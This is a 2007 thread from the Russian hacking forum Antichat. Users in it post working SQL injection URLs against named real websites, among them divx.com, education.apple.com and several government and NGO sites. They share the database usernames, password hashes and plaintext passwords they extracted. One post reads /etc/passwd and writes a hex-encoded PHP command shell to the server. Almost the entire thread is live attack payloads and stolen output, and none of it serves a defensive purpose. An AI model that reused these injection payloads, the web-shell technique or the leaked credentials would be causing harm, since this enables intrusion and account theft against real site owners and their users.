ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.06.2007, 01:04
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

To Spyder
Для начала мона системного вытащить:
Код:
http://www.divx.com/company/press/press_detail.php?pr_id=-4+union+select+1,convert(user+using+latin1),3,4+from+mysql.user+limit+0,1/*
user: drupal
hash: 654065ad41dfec0d
 
Ответить с цитированием

  #2  
Старый 10.06.2007, 01:46
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow

Цитата:
Цитата:http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*


ооо
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,concat_ws(0x3a20,user_id,user_n ame,user_password,user_email,user_icq),4,5,6,7+fro m+users+limit+0,1/*

*E0AEE55D5A64DF698178C496D6BD03C2ED0336C0: kistion@cyberacing.ru: 89538062

Последний раз редактировалось Серенький; 10.06.2007 в 01:47.. Причина: sql
 
Ответить с цитированием

  #3  
Старый 10.06.2007, 02:44
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

alextoun - в твое скули имееться таблица усер:
Код:
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7+from+users/*
Цитата:
Сообщение от Ky3bMu4  
...
Код:
http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,version(),3,user(),5,6,7,8,9,10,11,12,13,14,15,16,user()/*
Ky3bMu4 аналогично имееться таблица усер:
cedric:cedalaloi
jim:jed&2006
 
Ответить с цитированием

  #4  
Старый 10.06.2007, 02:57
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www.contagem.mg.gov.br
version, database, user
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
etc/passwd
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f6574632f706173737764)+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
shell
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f7068702073797374656d28245f4745545b636d645d293b203f3e+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+into_outfile+/*
www.zjda.gov.cn
Код:
http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),database(),version())/*&op=recommend

Последний раз редактировалось Isis; 10.06.2007 в 03:18..
 
Ответить с цитированием

  #5  
Старый 10.06.2007, 12:31
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

education.apple.com
Цитата:
http://education.apple.com/education/ilife/subject_template.php?subject_id=-16+union+select+1,2,3,4,5,6,7,convert(concat_ws(ch ar(58),user,password,host)+using+latin1),9,10,11,1 2,13,14,15,16+from+mysql.user+limit+3,1
admin:*4ACFE3202A5FF5CF467898FC58AAB1D615029441:%
 
Ответить с цитированием

  #6  
Старый 10.06.2007, 14:01
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://www.toraks.org.tr/journal/text.php3?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+articles/*
Код:
http://www.tutak.bel.tr/index2.php?id=-2+union+select+1,2,3,concat(user,char(58),pass),5+from+user+limit+0,1/*

Последний раз редактировалось _Pantera_; 10.06.2007 в 14:54..
 
Ответить с цитированием

  #7  
Старый 10.06.2007, 15:02
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://www.pvc.maricopa.edu/news/news_article.php?loc=-107+union+select+1,2,3,4,concat_ws(0x3a,VERSION(), DATABASE(),USER()),6,7,8,9,10,11,12,13
Дальше лень
 
Ответить с цитированием

  #8  
Старый 10.06.2007, 17:16
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Алкогольный портал Госалкогольинспекции РТ

Код:
http://www.tatalc.ru/index.php?page=7&idnews=-12345+union+select+1,2,3,4,5,concat(name,char(58),passwd),7,8,   9,10,11,12,13,14,15,16,17,18+from+users+limit+0,1/*
USER: root@localhost
DATABASE: tatalc
VERSION: 4.0.24

Пароли в открытом виде
Администратор:N58y0Aa
 
Ответить с цитированием

sql
  #9  
Старый 10.06.2007, 17:33
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

http://www.stplus.ru/
mysql 5
admins : id_admin,login,password,name
Цитата:
http://www.stplus.ru/content.php?id=-14+union+select+1,2,concat_ws(0x203a20,id_admin,lo gin,password,name,wrap),4+from+admins+limit+1,1/*
avk : adafff23fe27d62fa9d5220cc0b3a8ea : assassin
a_volkov : 00a809937eddc44521da9521269e75c6 : emma
 
Ответить с цитированием

  #10  
Старый 10.06.2007, 17:58
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Сайт какой-то певицы.

Код:
http://www.alesya.by/interview.php?act=intview&int=-123456+union+select+1,2,3,4,3/*
USER: syabry@localhost
DATABASE: syabry_xmb1
VERSION: 4.1.21-standard


КАРЕЛЬСКАЯ РЕГИОНАЛЬНАЯ ОБЩЕСТВЕННАЯ ПРИРОДООХРАННАЯ ОРГАНИЗАЦИЯ

Код:
http://spok.onego.ru/index.php?lang=en&page=show.php&id=-12345+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14+from+INFORMATION_SCHE  MA.TABLES+limit+0,1/*
USER: spok_office_user@home.onego.ru
DATABASE: spok_office_db
VERSION: 5.0.37
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ